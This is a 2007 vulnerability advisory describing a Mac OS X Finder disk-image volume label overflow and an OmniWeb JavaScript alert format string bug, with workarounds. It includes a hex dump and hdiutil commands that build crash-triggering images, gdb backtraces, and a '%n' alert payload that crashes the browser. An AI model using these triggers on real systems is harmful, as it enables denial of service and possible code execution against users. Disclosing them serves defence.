DMA[2007-0107a] OmniWeb Javascript Alert Format String Vulnerabiity and DMA[2007-0109a] Apple Finder Disk Image Volume Label Overflow / DoS
I've been subject to a few DoS attacks as of late so these did not quite
make it out. Enjoy the typos as usual. =P
-KF
DMA[2007-0109a] - 'Apple Finder Disk Image Volume Label Overflow / DoS'
Author: Kevin Finisterre
Vendor(s): http://www.apple.com
Product: '<= OSX 10.4 (?)'
References:
http://www.digitalmunition.com/DMA[2007-0109a].txt
http://www.apple.com/macosx/features/finder/
http://projects.info-pull.com/moab/MOAB-09-01-2007.html
Description:
Your home on the Mac, Finder gives you lots of options for locating, displaying
and organizing all your
files and folders. From the power of Spotlight search technology to the
flexibility of customizable item
views, Mac OS X Finder truly shows your Mac at a glance.
You can really piss Finder off in several ways by passing long volume labels to
various types of disk
images. Here is the hex dump of an example label that can be used to trigger
the issue.
0009c00: 4c41 424c be42 0000 0000 0001 4594 86e1 LABL.B......E...
0009c10: 00ff 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
0009c20: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c30: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c40: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c50: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c60: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c70: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c80: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c90: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009ca0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cb0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cc0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cd0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009ce0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cf0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009d00: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009d10: 4100 0000 0000 0000 0000 0000 0000 0000 A...............
Creating the images is something fairly easy to do.
$ hdiutil create -sectors 31337 -type SPARSE -fs HFS+ -volname `perl -e 'print
"A" x 255'` -layout NONE test.sparseimage
$ hdiutil create test.dmg -size 01m -fs HFS+ -volname `perl -e 'print "A" x
255'`
$ hdiutil create test.dmg -size 200k -fs UFS -volname `perl -e 'print "A" x
255'`
Attach gdb to Finder and open any of the above .dmg files and you will see the
following crash.
(gdb) bt
#0 0xffff0ac4 in ___memcpy () at
/System/Library/Frameworks/System.framework/PrivateHeaders/i386/cpu_capabilities.h:228
#1 0x90c93952 in _FSCopyExtendedAliasInfoFromAliasPtr ()
#2 0x9252939d in TNode::CreateVirtualAliasRecord ()
#3 0x92528872 in TNode::PopulateVirtualContainerFromSFL ()
#4 0x92513343 in TNodeSyncTask::SyncTaskProc ()
#5 0x90cb3f84 in PrivateMPEntryPoint ()
#6 0x90023d87 in _pthread_body ()
See Alastairs blog (http://alastairs-place.net) in about 3 days for an
explaination of exploitability.
Workaround:
Do not mount disk images or simply disable finder and use Spotlight instead.
1. Open Terminal, found in /Applications -> Utilities, and then type
'sudo mv /System/Library/CoreServices/Finder.app /Applications/'
2. Still in Terminal, type killall Finder -- this kills the process named
Finder, and it should not restart! Note that this
does not affect the Dock or Expos
The following command will unmount a disk image in the event that your Finder
has been put into a DoS condition.
$ hdiutil unmount
/Volumes/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
DMA[2007-0107a] - 'OmniWeb Javascript Alert Format String Vulnerabiity'
Author: Kevin Finisterre
Vendor(s): http://www.omnigroup.com
Product: 'OmniWeb 5.51 (?)'
References:
http://www.digitalmunition.com/DMA[2007-0107a].txt
http://www.omnigroup.com/applications/omniweb/
http://projects.info-pull.com/moab/MOAB-07-01-2007.html
http://www.omnigroup.com/applications/omniweb/download/
http://blog.omnigroup.com/2007/01/07/omniweb-552-now-available-and-more-secure/
Description:
You're a Mac fan, right? When people ask you why you like the Mac, you probably
think of the attention to detail that
makes the Mac user experience superior. It's the sum of a lot of different
things that add up to a system that's more
powerful, more beautiful, and more fun.
What if you thought of a web browser in the same way? You use a web browser all
the time, for working, for entertainment,
for research; how cool would it be if every time you used it, you thought "Wow,
this rules!"
Welcome to OmniWeb. OmniWeb elevates your web user experience to be more
productive, more efficient, and more fun. You'll
find information more quickly. You'll stay organized. You'll see the entire
internet the way you choose. It's the browser
that puts you in control.
Sure, you can use a standard web browser, with standard features. But you
didn't choose a standard software experience -
you chose the Mac. Why not try a browser built just for discriminating people
with fabulous taste, like yourself?
The only real reason to not make use of such a fabulous browser would be bad
code.
(gdb) r /Users/MacFan/Sites/test.html
Starting program: /Applications/OmniWeb.app/Contents/MacOS/OmniWeb
/Users/MacFan/Sites/test.html
Reading symbols for shared libraries
...................++..++.......................................................++++
++++.......++. done
OCCCrashCatcher: Not enabling crash catching since we're connected to a tty
(and thus presumably in gdb)
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries .. done
Reading symbols for shared libraries ... done
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x005dec56
0x9000c0c1 in __vfprintf ()
(gdb) bt
#0 0x9000c0c1 in __vfprintf ()
#1 0x90100ea9 in snprintf_l ()
#2 0x908119d5 in _CFStringAppendFormatAndArgumentsAux ()
#3 0x9081091c in _CFStringCreateWithFormatAndArgumentsAux ()
#4 0x925daa5d in -[NSPlaceholderString initWithFormat:locale:arguments:] ()
#5 0x925fc670 in -[NSString initWithFormat:arguments:] ()
#6 0x9336056f in -[NSAlert
buildAlertStyle:title:message:first:second:third:oldStyle:args:] ()
#7 0x934ac77a in _NXDoLocalRunAlertPanel ()
#8 0x934ac4cc in NSRunAlertPanel ()
#9 0x000b6a6e in -[OWTab(WebUIDelegate)
webView:runJavaScriptAlertPanelWithMessage:] ()
#10 0x005ded54 in -[WebFrameBridge runJavaScriptAlertPanelWithMessage:] ()
(gdb) shell cat /Users/MacFan/Sites/test.html
<script>alert('%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n')</script>
Workaround:
Download the latest version of OmniWeb or see the MOAB Fixes Google group for a
work around